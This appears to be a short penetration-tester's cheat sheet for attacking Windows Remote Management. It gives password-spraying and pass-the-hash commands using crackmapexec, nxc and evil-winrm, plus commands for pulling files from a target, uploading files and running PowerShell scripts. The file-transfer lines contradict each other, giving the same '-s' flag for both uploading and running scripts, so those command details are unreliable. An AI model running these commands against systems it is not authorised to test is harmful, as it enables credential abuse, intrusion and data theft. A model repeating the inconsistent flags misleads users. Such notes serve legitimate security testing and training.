Evil-WinRM (5985/5986)
1. ToDo
Scanning
crackmapexec --verbose winrm [--port <port>] <IP>
crackmapexec --verbose winrm [--port <port>] <IP> -u <username> -p <password>
nxc winrm <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc winrm <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-successInitiate connection
evil-winrm -i <IP> [-P <port>] -u <username> -p <password>
evil-winrm -i <IP> [-P <port>] -u <username> -H <hash>Extract data
While in a winrm session -
download <source file> <destination file>
While outside a winrm session -
evil-winrm -i <ip> -u <username> -p <password> -s "source_file" -d "destination_directory"
# Used to upload files onto target machine
evil-winrm -i <ip> -u <username> -p <password> -g "source_file" -d "destination_directory"
# Used to download files from target machine
evil-winrm -i <ip> -u <username> -p <password> -s "powershell script"
# Used to run powershell scriptAlternative: cadaver
cadaver http://<ip>
# Verify usability with: crackmapexec winrm <ip>
# Look for HTTP entries from outputLast updated